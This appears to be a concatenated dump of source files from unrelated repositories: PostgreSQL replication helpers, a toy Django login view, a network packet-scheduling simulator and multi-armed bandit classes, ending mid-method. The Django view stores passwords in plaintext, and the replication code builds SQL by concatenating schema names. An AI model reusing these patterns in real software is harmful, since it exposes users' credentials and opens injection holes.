the truncate is prepended by a set lock_timeout = 10 seconds. If the lock is not acquired in that time
the procedure fallsback to a delete and vacuum.
"""
sql_clean="""
SELECT DISTINCT
format('SET lock_timeout=''10s'';TRUNCATE TABLE %%I.%%I CASCADE;',v_schema,v_table) v_truncate,
format('DELETE FROM %%I.%%I;',v_schema,v_table) v_delete,
format('VACUUM %%I.%%I;',v_schema,v_table) v_vacuum,
format('%%I.%%I',v_schema,v_table) as v_tab,
v_table
FROM
sch_chameleon.t_index_def
WHERE
i_id_source=%s
ORDER BY
v_table
;
"""
self.pg_conn.pgsql_cur.execute(sql_clean, (self.i_id_source, ))
tab_clean=self.pg_conn.pgsql_cur.fetchall()
for stat_clean in tab_clean:
st_truncate=stat_clean[0]
st_delete=stat_clean[1]
st_vacuum=stat_clean[2]
tab_name=stat_clean[3]
try:
self.logger.info("truncating table %s" % (tab_name,))
self.pg_conn.pgsql_cur.execute(st_truncate)
except:
self.logger.info("truncate failed, fallback to delete on table %s" % (tab_name,))
self.pg_conn.pgsql_cur.execute(st_delete)
self.logger.info("running vacuum on table %s" % (tab_name,))
self.pg_conn.pgsql_cur.execute(st_vacuum)
def drop_src_indices(self):
"""
The method executes the index drop statements read from the table t_index_def.
The method is used when resyncing the replica for removing the indices before the bulk load.
"""
sql_idx="""
SELECT
t_drop
FROM
sch_chameleon.t_index_def
WHERE
i_id_source=%s;
"""
self.pg_conn.pgsql_cur.execute(sql_idx, (self.i_id_source, ))
idx_drop=self.pg_conn.pgsql_cur.fetchall()
for drop_stat in idx_drop:
self.pg_conn.pgsql_cur.execute(drop_stat[0])
def create_src_indices(self):
"""
The method executes the index DDL read from the table t_index_def.
The method is used when resyncing the replica for recreating the indices after the bulk load.
"""
sql_idx="""
SELECT
t_create
FROM
sch_chameleon.t_index_def
WHERE
i_id_source=%s;
"""
self.pg_conn.pgsql_cur.execute(sql_idx, (self.i_id_source, ))
idx_create=self.pg_conn.pgsql_cur.fetchall()
for create_stat in idx_create:
self.pg_conn.pgsql_cur.execute(create_stat[0])
def get_index_def(self):
"""
The method inserts in the table t_index_def the create and drop statements for the tables affected by
the resync replica.
"""
table_limit = ''
if self.table_limit[0] != '*':
table_limit = self.pg_conn.pgsql_cur.mogrify("""WHERE table_name IN (SELECT unnest(%s))""",(self.table_limit, )).decode()
sql_get_idx="""
DELETE FROM sch_chameleon.t_index_def WHERE i_id_source=%s;
INSERT INTO sch_chameleon.t_index_def
(
i_id_source,
v_schema,
v_table,
v_index,
t_create,
t_drop
)
SELECT
i_id_source,
schema_name,
table_name,
index_name,
CASE
WHEN indisprimary
THEN
format('ALTER TABLE %%I.%%I ADD CONSTRAINT %%I %%s',
schema_name,
table_name,
index_name,
pg_get_constraintdef(const_id)
)
ELSE
pg_get_indexdef(index_id)
END AS t_create,
CASE
WHEN indisprimary
THEN
format('ALTER TABLE %%I.%%I DROP CONSTRAINT %%I',
schema_name,
table_name,
index_name
)
ELSE
format('DROP INDEX %%I.%%I',
schema_name,
index_name
)
END AS t_drop
FROM
(
SELECT
tab.relname AS table_name,
indx.relname AS index_name,
idx.indexrelid index_id,
indisprimary,
sch.nspname schema_name,
src.i_id_source,
cns.oid as const_id
FROM
pg_index idx
INNER JOIN pg_class indx
ON
idx.indexrelid=indx.oid
INNER JOIN pg_class tab
INNER JOIN pg_namespace sch
ON
tab.relnamespace=sch.oid
ON
idx.indrelid=tab.oid
INNER JOIN sch_chameleon.t_sources src
ON sch.nspname=src.t_dest_schema
LEFT OUTER JOIN pg_constraint cns
ON
indx.relname=cns.conname
AND cns.connamespace=sch.oid
WHERE
sch.nspname=%s
) idx
""" + table_limit
self.pg_conn.pgsql_cur.execute(sql_get_idx, (self.i_id_source, self.dest_schema, ))
def drop_primary_key(self, token):
"""
The method drops the primary key for the table.
As tables without primary key cannot be replicated the method calls unregister_table
to remove the table from the replica set.
The drop constraint statement is not built from the token but generated from the information_schema.
:param token: the tokenised query for drop primary key
"""
self.logger.info("dropping primary key for table %s" % (token["name"],))
sql_gen="""
SELECT DISTINCT
format('ALTER TABLE %%I.%%I DROP CONSTRAINT %%I;',
table_schema,
table_name,
constraint_name
)
FROM
information_schema.key_column_usage
WHERE
table_schema=%s
AND table_name=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_gen, (self.dest_schema, token["name"]))
value_check=self.pg_conn.pgsql_cur.fetchone()
if value_check:
sql_drop=value_check[0]
self.pg_conn.pgsql_cur.execute(sql_drop)
self.unregister_table(token["name"])
def gen_query(self, token):
"""
The method builds the DDL using the tokenised SQL stored in token.
The supported commands are
DROP TABLE
TRUNCATE
CREATE TABLE
ALTER TABLE
DROP PRIMARY KEY
:param token: A dictionary with the tokenised sql statement
:return: query the DDL query in the PostgreSQL dialect
:rtype: string
"""
query=""
if token["command"] =="DROP TABLE":
query=" %(command)s IF EXISTS \"%(name)s\";" % token
elif token["command"] =="TRUNCATE":
query=" %(command)s TABLE \"%(name)s\" CASCADE;" % token
elif token["command"] =="CREATE TABLE":
table_metadata={}
table_metadata["columns"]=token["columns"]
table_metadata["name"]=token["name"]
table_metadata["indices"]=token["indices"]
self.table_metadata={}
self.table_metadata[token["name"]]=table_metadata
self.build_tab_ddl()
self.build_idx_ddl()
query_type=' '.join(self.type_ddl[token["name"]])
query_table=self.table_ddl[token["name"]]
query_idx=' '.join(self.idx_ddl[token["name"]])
query=query_type+query_table+query_idx
self.store_table(token["name"])
elif token["command"] == "ALTER TABLE":
query=self.build_alter_table(token)
elif token["command"] == "DROP PRIMARY KEY":
self.drop_primary_key(token)
return query
def write_ddl(self, token, query_data):
"""
The method writes the DDL built from the tokenised sql into PostgreSQL.
:param token: the tokenised query
:param query_data: query's metadata (schema,binlog, etc.)
"""
sql_path=" SET search_path="+self.dest_schema+";"
pg_ddl=sql_path+self.gen_query(token)
log_table=query_data["log_table"]
insert_vals=( query_data["batch_id"],
token["name"],
query_data["schema"],
query_data["binlog"],
query_data["logpos"],
pg_ddl
)
sql_insert="""
INSERT INTO sch_chameleon."""+log_table+"""
(
i_id_batch,
v_table_name,
v_schema_name,
enm_binlog_event,
t_binlog_name,
i_binlog_position,
t_query
)
VALUES
(
%s,
%s,
%s,
'ddl',
%s,
%s,
%s
)
;
"""
self.pg_conn.pgsql_cur.execute(sql_insert, insert_vals)
def check_reindex(self):
"""
the function checks if there is any reindex running and holds for the given number of seconds
"""
sql_check="""
SELECT
count(*)
FROM
pg_stat_activity
WHERE
datname=current_database()
AND application_name = ANY(%s) ;
"""
while True:
self.pg_conn.pgsql_cur.execute(sql_check, (self.reindex_app_names, ))
reindex_tup = self.pg_conn.pgsql_cur.fetchone()
reindex_cnt = reindex_tup[0]
if reindex_cnt == 0:
break;
self.logger.info("reindex detected, sleeping %s second(s)" % (self.sleep_on_reindex,))
time.sleep(self.sleep_on_reindex)
def set_consistent_table(self, table):
"""
The method set to NULL the binlog name and position for the given table.
When the table is marked consistent the read replica loop reads and saves the table's row images.
:param table: the table name
"""
sql_set = """
UPDATE sch_chameleon.t_replica_tables
SET
t_binlog_name = NULL,
i_binlog_position = NULL
WHERE
i_id_source = %s
AND v_table_name = %s
AND v_schema_name = %s
;
"""
self.pg_conn.pgsql_cur.execute(sql_set, (self.i_id_source, table, self.dest_schema))
def get_inconsistent_tables(self):
"""
The method collects the tables in not consistent state.
The informations are stored in a dictionary which key is the table's name.
The dictionary is used in the read replica loop to determine wheter the table's modifications
should be ignored because in not consistent state.
:return: a dictionary with the tables in inconsistent state and their snapshot coordinates.
:rtype: dictionary
"""
sql_get = """
SELECT
v_schema_name,
v_table_name,
t_binlog_name,
i_binlog_position
FROM
sch_chameleon.t_replica_tables
WHERE
t_binlog_name IS NOT NULL
AND i_binlog_position IS NOT NULL
AND i_id_source = %s
;
"""
inc_dic = {}
self.pg_conn.pgsql_cur.execute(sql_get, (self.i_id_source, ))
inc_results = self.pg_conn.pgsql_cur.fetchall()
for table in inc_results:
tab_dic = {}
tab_dic["schema"] = table[0]
tab_dic["table"] = table[1]
tab_dic["log_seq"] = int(table[2].split('.')[1])
tab_dic["log_pos"] = int(table[3])
inc_dic[table[1]] = tab_dic
return inc_dic
def delete_table_events(self):
"""
The method removes the events from the log table for specific table and source.
Is used to cleanup any residual event for a a synced table in the replica_engine's sync_table method.
"""
sql_clean = """
DELETE FROM sch_chameleon.t_log_replica
WHERE
i_id_event IN (
SELECT
log.i_id_event
FROM
sch_chameleon.t_replica_batch bat
INNER JOIN sch_chameleon.t_log_replica log
ON log.i_id_batch=bat.i_id_batch
WHERE
log.v_table_name=ANY(%s)
AND bat.i_id_source=%s
)
;
"""
self.pg_conn.pgsql_cur.execute(sql_clean, (self.table_limit, self.i_id_source, ))
``` |
{
"source": "jinjinanan/HelloDjango1",
"score": 2
} |
#### File: HelloDjango1/app1/views.py
```python
from django.shortcuts import render
from app1 import models
# Create your views here.
from django.shortcuts import HttpResponse
user_list = [
{'user':'jack','pwd':'<PASSWORD>'},
{'user':'tom','pwd':'<PASSWORD>'},
]
def index(request):
# return HttpResponse('Hello world!')
if request.method == 'POST':
username = request.POST.get('username',None)
password = request.POST.get('password',None)
# temp = {'user':username,'pwd':password}
# user_list.append(temp)
models.UserInfo.objects.create(user=username,pwd=password)
user_list = models.UserInfo.objects.all()
return render(request,'index.html',{'data':user_list})
``` |
{
"source": "JinJinGuang/ns.py",
"score": 3
} |
#### File: ns.py/examples/two_level_sp.py
```python
import simpy
from ns.packet.dist_generator import DistPacketGenerator
from ns.packet.sink import PacketSink
from ns.port.port import Port
from ns.scheduler.sp import SPServer
def packet_arrival():
return 1
def const_size():
return 1000.0
env = simpy.Environment()
total_groups = 2
total_flows_per_group = 3
source_rate = 8.0 * const_size() / packet_arrival()
service_rate_L1 = 2 * total_groups * total_flows_per_group * source_rate
service_rate_L2 = 2 * total_flows_per_group * source_rate
group_weights = {}
drr_server_per_group = {}
for grp_id in range(total_groups):
for flow_id in range(total_flows_per_group):
group_weights[f'grp_{grp_id}_flow_{flow_id}'] = (grp_id +
1) * 3 + flow_id * 2
ps = PacketSink(env)
drr_server = SPServer(env,
service_rate_L1,
group_weights,
zero_buffer=True,
debug=False)
drr_server.out = ps
# Setting up the DRR server for each group
for grp_id in range(total_groups):
flow_weights = {}
for flow_id in range(total_flows_per_group):
flow_weights[f'grp_{grp_id}_flow_{flow_id}'] = (grp_id +
1) * 3 + flow_id * 2
drr_server_per_group[f'grp_{grp_id}'] = SPServer(
env,
service_rate_L2,
flow_weights,
zero_buffer=True,
zero_downstream_buffer=True,
debug=True)
for flow_id in range(total_flows_per_group):
pg = DistPacketGenerator(env,
f"grp_{grp_id}_flow_{flow_id}",
packet_arrival,
const_size,
initial_delay=0.0,
finish=3,
flow_id=f"grp_{grp_id}_flow_{flow_id}",
debug=True)
tail_drop_buffer = Port(env,
source_rate,
qlimit=None,
zero_downstream_buffer=True,
debug=True)
pg.out = tail_drop_buffer
tail_drop_buffer.out = drr_server_per_group[f'grp_{grp_id}']
drr_server_per_group[f'grp_{grp_id}'].out = drr_server
env.run(until=100)
for grp_id in range(total_groups):
for flow_id in range(total_flows_per_group):
print(
f"At the packet sink, packet arrival times for group {grp_id} and flow {flow_id} are:"
)
print(ps.arrivals[f'grp_{grp_id}_flow_{flow_id}'])
```
#### File: ns/scheduler/virtual_clock.py
```python
from collections import defaultdict as dd
from ns.packet.packet import Packet
from ns.utils import taggedstore
class VirtualClockServer:
""" Implements a virtual clock server.
Parameters
----------
env: simpy.Environment
The simulation environment.
rate: float
The bit rate of the port.
vticks: dict
This can be either a list or a dictionary. If it is a list, it uses the flow_id
as its index to look for the flow's corresponding 'vtick'. If it is a dictionary,
it contains (flow_id -> vtick) pairs for each possible flow_id. We assume
that the vticks are the inverse of the desired rates for the corresponding flows,
in bits per second.
zero_buffer: bool
Does this server have a zero-length buffer? This is useful when multiple
basic elements need to be put together to construct a more complex element
with a unified buffer.
zero_downstream_buffer: bool
Does this server's downstream element has a zero-length buffer? If so, packets
may queue up in this element's own buffer rather than be forwarded to the
next-hop element.
debug: bool
If True, prints more verbose debug information.
"""
def __init__(self,
env,
rate,
vticks,
zero_buffer=False,
zero_downstream_buffer=False,
debug=False):
self.env = env
self.rate = rate
self.vticks = vticks
if isinstance(self.vticks, list):
self.aux_vc = [0.0 for __ in range(len(vticks))]
self.v_clocks = [0.0 for __ in range(len(vticks))]
# Keep track of the number of packets from each flow in the queue
self.flow_queue_count = [0 for __ in range(len(vticks))]
elif isinstance(self.vticks, dict):
self.aux_vc = {key: 0.0 for (key, __) in vticks.items()}
self.v_clocks = {key: 0.0 for (key, __) in vticks.items()}
self.flow_queue_count = {key: 0 for (key, __) in vticks.items()}
else:
raise ValueError('vticks must be either a list or a dictionary.')
self.out = None
self.packets_received = 0
self.packets_dropped = 0
self.debug = debug
self.current_packet = None
self.byte_sizes = dd(lambda: 0)
self.upstream_updates = {}
self.upstream_stores = {}
self.zero_buffer = zero_buffer
self.zero_downstream_buffer = zero_downstream_buffer
if self.zero_downstream_buffer:
self.downstream_store = taggedstore.TaggedStore(env)
self.store = taggedstore.TaggedStore(env)
self.action = env.process(self.run())
def packet_in_service(self) -> Packet:
"""
Returns the packet that is currently being sent to the downstream element.
Used by a ServerMonitor.
"""
return self.current_packet
def byte_size(self, flow_id) -> int:
"""
Returns the size of the queue for a particular flow_id, in bytes.
Used by a ServerMonitor.
"""
if flow_id in self.byte_sizes:
return self.byte_sizes[flow_id]
return 0
def size(self, flow_id) -> int:
"""
Returns the size of the queue for a particular flow_id, in the
number of packets. Used by a ServerMonitor.
"""
return self.flow_queue_count[flow_id]
def all_flows(self) -> list:
"""
Returns a list containing all the flow IDs.
"""
return self.byte_sizes.keys()
def update(self, packet):
"""The packet has just been retrieved from this element's own buffer, so
update internal housekeeping states accordingly.
"""
if self.zero_buffer:
self.upstream_stores[packet].get()
del self.upstream_stores[packet]
self.upstream_updates[packet](packet)
del self.upstream_updates[packet]
flow_id = packet.flow_id
self.flow_queue_count[flow_id] -= 1
if self.debug:
print(f"Sent Packet {packet.packet_id} from flow {flow_id}")
if flow_id in self.byte_sizes:
self.byte_sizes[flow_id] -= packet.size
else:
raise ValueError("Error: the packet is from an unrecorded flow.")
def run(self):
"""The generator function used in simulations."""
while True:
if self.zero_downstream_buffer:
packet = yield self.downstream_store.get()
self.current_packet = packet
yield self.env.timeout(packet.size * 8.0 / self.rate)
self.out.put(packet,
upstream_update=self.update,
upstream_store=self.store)
self.current_packet = None
else:
packet = yield self.store.get()
self.update(packet)
self.current_packet = packet
yield self.env.timeout(packet.size * 8.0 / self.rate)
self.out.put(packet)
self.current_packet = None
def put(self, packet, upstream_update=None, upstream_store=None):
""" Sends a packet to this element. """
self.packets_received += 1
self.byte_sizes[packet.flow_id] += packet.size
now = self.env.now
flow_id = packet.flow_id
self.flow_queue_count[flow_id] += 1
if self.v_clocks[flow_id] == 0:
# Upon receiving the first packet from this flow_id, set its
# virtual clock to the current real time
self.v_clocks[flow_id] = now
# Update virtual clocks (vc) for the corresponding flow. We assume
# that vticks is the desired bit time, i.e., the inverse of the
# desired bits per second data rate. Hence, we multiply this
# value by the size of the packet in bits.
self.aux_vc[flow_id] = max(now, self.aux_vc[flow_id])
self.v_clocks[flow_id] = self.v_clocks[
flow_id] + self.vticks[flow_id] * packet.size * 8.0
self.aux_vc[flow_id] += self.vticks[flow_id]
# Lots of work to do here to implement the queueing discipline
if self.debug:
print(
f"Packet arrived at {self.env.now}, with flow_id {flow_id}, "
f"packet_id {packet.packet_id}, virtual clocks {self.v_clocks[flow_id]}, "
f"aux_vc {self.aux_vc[flow_id]}")
if self.zero_buffer and upstream_update is not None and upstream_store is not None:
self.upstream_stores[packet] = upstream_store
self.upstream_updates[packet] = upstream_update
if self.zero_downstream_buffer:
self.downstream_store.put((self.aux_vc[flow_id], packet))
return self.store.put((self.aux_vc[flow_id], packet))
```
#### File: ns/shaper/token_bucket.py
```python
import simpy
class TokenBucketShaper:
""" The token bucket size should be greater than the size of the largest packet that
can occur on input. If this is not the case we always accumulate enough tokens to let
the current packet pass based on the average rate. This may not be the behavior you desire.
Parameters
----------
env: simpy.Environment
The simulation environment.
rate: int
The token arrival rate in bits.
bucket_size: int
The token bucket size in bytes.
peak: int (or None for an infinite peak sending rate)
The peak sending rate in bits of the buffer (quickest time two packets could be sent).
zero_buffer: bool
Does this server have a zero-length buffer? This is useful when multiple
basic elements need to be put together to construct a more complex element
with a unified buffer.
zero_downstream_buffer: bool
Does this server's downstream element has a zero-length buffer? If so, packets
may queue up in this element's own buffer rather than be forwarded to the
next-hop element.
debug: bool
If True, prints more verbose debug information.
"""
def __init__(self,
env,
rate,
bucket_size,
peak=None,
zero_buffer=False,
zero_downstream_buffer=False,
debug=False):
self.store = simpy.Store(env)
self.env = env
self.rate = rate
self.out = None
self.packets_received = 0
self.packets_sent = 0
self.bucket_size = bucket_size
self.peak = peak
self.upstream_updates = {}
self.upstream_stores = {}
self.zero_buffer = zero_buffer
self.zero_downstream_buffer = zero_downstream_buffer
if self.zero_downstream_buffer:
self.downstream_stores = simpy.Store(env)
self.current_bucket = bucket_size # Current size of the bucket in bytes
self.update_time = 0.0 # Last time the bucket was updated
self.debug = debug
self.busy = 0 # Used to track if a packet is currently being sent
self.action = env.process(self.run())
def update(self, packet):
"""The packet has just been retrieved from this element's own buffer, so
update internal housekeeping states accordingly."""
if self.zero_buffer:
self.upstream_stores[packet].get()
del self.upstream_stores[packet]
self.upstream_updates[packet](packet)
del self.upstream_updates[packet]
if self.debug:
print(
f"Sent packet {packet.packet_id} from flow {packet.flow_id}.")
def run(self):
"""The generator function used in simulations."""
while True:
if self.zero_downstream_buffer:
packet = yield self.downstream_stores.get()
else:
packet = yield self.store.get()
self.update(packet)
now = self.env.now
# Add tokens to the bucket based on the current time
self.current_bucket = min(
self.bucket_size, self.current_bucket + self.rate *
(now - self.update_time) / 8.0)
self.update_time = now
# Check if there are a sufficient number of tokens to allow the packet
# to be sent; if not, we will then wait to accumulate enough tokens to
# allow this packet to be sent regardless of the bucket size.
if packet.size > self.current_bucket: # needs to wait for the bucket to fill
yield self.env.timeout(
(packet.size - self.current_bucket) * 8.0 / self.rate)
self.current_bucket = 0.0
self.update_time = self.env.now
else:
self.current_bucket -= packet.size
self.update_time = self.env.now
# Sending the packet now
if self.peak is None: # infinite peak rate
if self.zero_downstream_buffer:
self.out.put(packet,
upstream_update=self.update,
upstream_store=self.store)
else:
self.out.put(packet)
else:
yield self.env.timeout(packet.size * 8.0 / self.peak)
if self.zero_downstream_buffer:
self.out.put(packet,
upstream_update=self.update,
upstream_store=self.store)
else:
self.out.put(packet)
self.packets_sent += 1
if self.debug:
print(
f"Sent packet {packet.packet_id} from flow {packet.flow_id}."
)
def put(self, packet, upstream_update=None, upstream_store=None):
""" Sends a packet to this element. """
self.packets_received += 1
if self.zero_buffer and upstream_update is not None and upstream_store is not None:
self.upstream_stores[packet] = upstream_store
self.upstream_updates[packet] = upstream_update
if self.zero_downstream_buffer:
self.downstream_stores.put(packet)
return self.store.put(packet)
```
#### File: ns/switch/switch.py
```python
from ns.port.port import Port
from ns.demux.fib_demux import FIBDemux
from ns.scheduler.wfq import WFQServer
class SimplePacketSwitch:
""" Implements a simple packet switch with FIFO bounded buffers for outgoing ports.
Parameters
----------
env: simpy.Environment
the simulation environment
nports: int
the total number of ports on this switch.
port_rate: float
the bit rate of the port
buffer_size: int
the size of an outgoing port' buffer
debug: bool
If True, prints more verbose debug information.
"""
def __init__(self,
env,
nports: int,
port_rate: float,
buffer_size: int,
debug: bool = False) -> None:
self.env = env
self.ports = []
for __ in range(nports):
self.ports.append(
Port(env,
rate=port_rate,
qlimit=buffer_size,
limit_bytes=False,
debug=debug))
self.demux = FIBDemux(fib=None, outs=self.ports, default=None)
def put(self, packet):
""" Sends a packet to this element. """
self.demux.put(packet)
class WFQPacketSwitch:
""" Implements a simple packet switch with WFQ bounded buffers for outgoing ports.
Parameters
----------
env: simpy.Environment
the simulation environment
nports: int
the total number of ports on this switch.
port_rate: float
the bit rate of the port
buffer_size: int
the size of an outgoing port' buffer
debug: bool
If True, prints more verbose debug information.
"""
def __init__(self, env, nports: int, port_rate: float, buffer: int,
weights: list) -> None:
self.env = env
self.ports = []
self.egress_ports = []
self.schedulers = []
for __ in range(nports):
swp = Port(env,
rate=port_rate,
qlimit=buffer,
limit_bytes=False,
zero_downstream_buffer=True)
wfqs = WFQServer(env,
rate=port_rate,
weights=weights,
zero_buffer=True)
swp.out = wfqs
self.egress_ports.append(swp)
self.schedulers.append(wfqs)
self.ports.append(wfqs.out)
self.demux = FIBDemux(fib=None, outs=self.egress_ports, default=None)
def put(self, packet):
""" Sends a packet to this element. """
self.demux.put(packet)
``` |
{
"source": "JINJINT/MABtest",
"score": 3
} |
#### File: MABtest/MABtest/estimation.py
```python
import math
from numpy import sqrt, log, exp, mean, cumsum, zeros, argsort, argmin, argmax, array, power
import numpy
from numpy.random import beta, normal, gamma
def update_posterior(prior_para_1, prior_para_2, reward, reward_type, time_decay = 0.):
if time_decay == 0.:
# compute the posterior based on known prior format
if reward_type =='Bernoulli': # Bernoulli
# using Beta Proir Beta(a,b)
prior_para_1 += reward
prior_para_2 += (1-reward)
if reward_type == 'Gaussian': # Gaussian with known variance 1 and unknown mean
# using Gauss prior N(a,b)
prior_para_1 = (1/(1+prior_para_2))*prior_para_1 + (prior_para_2/(1+prior_para_2))*reward
prior_para_2 = 1/(1/prior_para_2 + 1)
if reward_type == 'Poisson': # Poisson with unkonwn mean
# using gamma prior Gamma(a,b)
prior_para_1 += reward
prior_para_2 += 1
else:
# compute the posterior based on known prior format
if reward_type =='Bernoulli':
# using Beta Proir Beta(a,b)
prior_para_1 = (1-time_decay) * prior_para_1 + reward
prior_para_2 = (1-time_decay) * prior_para_2 + (1-reward)
if reward_type == 'Gaussian': # Gaussian with known precision 1 [precision = (1/sigma^2)] and unknown mean
# using Gauss prior N(a,1/b)
prior_para_1 = (time_decay/(time_decay+(1-time_decay)*prior_para_2))*prior_para_1 + (((1-time_decay)*prior_para_2)/(time_decay+(1-time_decay)*prior_para_2))*reward
prior_para_2 = 1/((1-time_decay)/prior_para_2 + time_decay)
if reward_type == 'Poisson':
# using gamma prior Gamma(a,b)
prior_para_1 += reward
prior_para_2 += 1
return prior_para_1, prior_para_2
def sample_posterior(prior_para_1, prior_para_2, reward_type, var_trade_off = 1):
# compute the posterior based on known prior format
# var_trade_off are used to inflate the variance
no_arms = len(prior_para_1)
if reward_type =='Bernoulli':
# using Beta Proir Beta(a,b)
return [beta(prior_para_1[i]/power(var_trade_off,2), prior_para_2[i]/power(var_trade_off,2)) for i in range(no_arms)]
if reward_type == 'Gaussian': # Gaussian with known precision 1 [precision = (1/sigma^2)] and unknown mean
# using Gauss prior N(a,1/b)
return [normal(loc = prior_para_1[i], scale = sqrt(prior_para_2[i])*var_trade_off) for i in range(no_arms)]
if reward_type == 'Poisson':
# using gamma prior Gamma(a,b)
return [gamma(prior_para_1[i]/power(var_trade_off,2), prior_para_2[i]/power(var_trade_off,2)) for i in range(no_arms)]
```
#### File: MABtest/MABtest/TS_CD.py
```python
from .uniform_CD import *
class TS_CD(uniform_CD):
def __init__(self, no_arms: int, no_output: int = 1,
conf_level : float =0.05, precision_level: float =0.0,
stop_type: str = 'Best', baseline: Callable[[int],float] = None,
reward_type: str = 'Bernoulli',
trade_off: float = 1, prior_para_1: List[float] =None, prior_para_2: List[float] =None,
time_window: int = 1000, verbose = False) -> None:
# inherent from the uniform class
super(TS_CD, self).__init__(no_arms, no_output, conf_level, precision_level, stop_type, baseline, reward_type, time_window, verbose)
# using the uncertainty inflation for trading off optimizaiton and inference
# the value ranging from 1 to infty, the higher, the bandit algo favors inference more, and incur more regret
self.trade_off = trade_off
# the parameter of the hypothetic distribution of the mean of arms, now we consider the distribution with two parameters, and different arms are independent
self.prior_para_1: List[float] = prior_para_1 # list of the first parameter of each arm
self.prior_para_2: List[float] = prior_para_2 # list of the second parameter of each arm
def __str__(self):
""" -> str"""
return self.__class__.__name__
def start(self, restart = False):
# initiation process that is the same with the uniform bandits
super(TS_CD, self).start(restart)
# initiation process that are perticular to the TS bandits
if not restart:
if self.prior_para_1 is None:
if self.reward_type == 'Bernoulli':
self.prior_para_1 = np.repeat(1., self.no_arms)
if self.reward_type == 'Gaussian':
self.prior_para_1 = np.repeat(0., self.no_arms)
if self.prior_para_2 is None:
self.prior_para_2 = np.repeat(1., self.no_arms)
else:
if self.reward_type == 'Bernoulli':
self.prior_para_1 = np.repeat(1., self.no_arms)
if self.reward_type == 'Gaussian':
self.prior_para_1 = np.repeat(0., self.no_arms)
self.prior_para_2 = np.repeat(1., self.no_arms)
def nextpull(self)-> List[int]:
'''
decide which arm(s) to pull next, return a list contains the index of arms
'''
# Thompson Sampling with the uncertainty inflation (when trade-off ==1, it recovers TS)
theta = sample_posterior(self.prior_para_1, self.prior_para_2, self.reward_type, self.trade_off)
argsorted_theta = argsort(theta)[::-1]
arm_idx = argsorted_theta[:self.no_output]
self.next_index = arm_idx
return list(self.next_index)
def update(self, arms: list, rewards: list)-> None:
'''
Update the bandit given the observed rewards for arms that are just pulled
Arguments:
arms : contains the index of pulled arms
rewards : the observed reward for each arm in arms
'''
if type(arms) is not list:
arms = [arms]
if type(rewards) is not list:
rewards = [rewards]
if len(arms)!=len(rewards):
raise ValueError("The length of pulled arms and rewards should be equal!")
for i, idx in enumerate(arms):
# get the reward for correspodning arm
reward = rewards[i]
# update the accumulated reward in total for the bandit
self.accreward += reward
# initiate the object for caculating confidence bounds
cb = ConfidenceBound(name = self.bound_type)
# get the info dictionary for correspodning arm
arm = self.arms[idx]
# delete the correspodning arm with old info in the sorted dictionary list
self.mu_hat_decreasing.remove(arm)
self.ucb_decreasing.remove(arm)
self.lcb_decreasing.remove(arm)
# calculate the updated info for the corresponding arm
arm['Sum'] += reward
arm['SumSquare'] += reward**2
arm['t'] += 1
arm['mu_hat'] = arm['Sum']/arm['t']
arm['mu_std'] = sqrt(abs(arm['SumSquare']/arm['t'] - arm['mu_hat']**2))
arm['lcb'] = cb.lower(arm['mu_hat'], self.conf_level/float(2.*(self.no_arms-self.no_output)), arm['t'], sigma =arm['mu_std'])
arm['ucb'] = cb.upper(arm['mu_hat'], self.conf_level/float(2.*(self.no_output)), arm['t'], sigma =arm['mu_std'])
self.prior_para_1[idx], self.prior_para_2[idx] = update_posterior(self.prior_para_1[idx], self.prior_para_2[idx], rewards[i], self.reward_type)
arm = self.detect_change(arm, reward)
if arm is None:
# if there is a change point up to now, restart the whole bandit
return
# if there is no chnage point up to now, continue updating by adding back the corresponding arm with updated info to the sorted dicitonary list
self.mu_hat_decreasing.add(arm)
self.ucb_decreasing.add(arm)
self.lcb_decreasing.add(arm)
# update the totoal number of pulls for the bandit
self.t += 1
```
#### File: MABtest/MABtest/TS.py
```python
from .uniform import *
class TS(uniform):
def __init__(self, no_arms: int, no_output: int = 1,
conf_level : float =0.05, precision_level: float =0.0,
stop_type: str = 'Best', baseline: Callable[[int],float] = None,
reward_type: str = 'Bernoulli',
trade_off: float = 1, prior_para_1: List[float] =None, prior_para_2: List[float] =None) -> None:
# inherent from the uniform class
super(TS, self).__init__(no_arms, no_output, conf_level, precision_level, stop_type, baseline, reward_type)
# using the uncertainty inflation for trading off optimizaiton and inference
# the value ranging from 1 to infty, the higher, the bandit algo favors inference more, and incur more regret
self.trade_off = trade_off
# the parameter of the hypothetic distribution of the mean of arms, now we consider the distribution with two parameters, and different arms are independent
self.prior_para_1: List[float] = prior_para_1 # list of the first parameter of each arm
self.prior_para_2: List[float] = prior_para_2 # list of the second parameter of each arm
def __str__(self):
""" -> str"""
return self.__class__.__name__
def start(self):
# initiation process that is the same with the uniform bandits
super(TS, self).start()
# initiation process that are perticular to the TS bandits
if self.reward_type == 'Bernoulli':
self.prior_para_1 = np.repeat(1., self.no_arms)
if self.reward_type == 'Gaussian':
self.prior_para_1 = np.repeat(0., self.no_arms)
self.prior_para_2 = np.repeat(1., self.no_arms)
def nextpull(self)-> List[int]:
'''
decide which arm(s) to pull next, return a list contains the index of arms
'''
# Thompson Sampling with the uncertainty inflation (when trade-off ==1, it recovers TS)
theta = sample_posterior(self.prior_para_1, self.prior_para_2, self.reward_type, self.trade_off)
argsorted_theta = argsort(theta)[::-1]
arm_idx = argsorted_theta[:self.no_output]
self.next_index = arm_idx
return list(self.next_index)
def update(self, arms: list, rewards: list)-> None:
'''
Update the bandit given the observed rewards for arms that are just pulled
Arguments:
arms : contains the index of pulled arms
rewards : the observed reward for each arm in arms
'''
# update process that is the same with the uniform bandits
super(TS, self).update(arms,rewards)
# update process that is particular to Thompson Sampling
for i, idx in enumerate(arms):
self.prior_para_1[idx], self.prior_para_2[idx] = update_posterior(self.prior_para_1[idx], self.prior_para_2[idx], rewards[i], self.reward_type)
```
#### File: MABtest/MABtest/UCB_decay.py
```python
from .uniform_decay import *
class UCB_decay(uniform_decay):
def __init__(self, no_arms: int, no_output: int = 1,
conf_level : float =0.05, precision_level: float =0.0,
stop_type: str = 'Best', baseline: Callable[[int],float] = None,
reward_type: str = 'Bernoulli', trade_off: float = 1,
time_decay = 0.001) -> None:
# inherent from the uniform class
super(UCB_decay, self).__init__(no_arms, no_output, conf_level, precision_level, stop_type, baseline, reward_type, time_decay)
# using the uncertainty inflation for trading off optimizaiton and inference
# ranging from 1 to infty, the higher, the bandit algo favors inference more, and incur more regret
self.trade_off = trade_off
def __str__(self):
""" -> str"""
return self.__class__.__name__
def nextpull(self)-> List[int]:
'''
decide which arm(s) to pull next, return a list contains the index of arms
'''
# UCB sampling with the uncertainty inflation (when trade-off ==1, it recovers UCB)
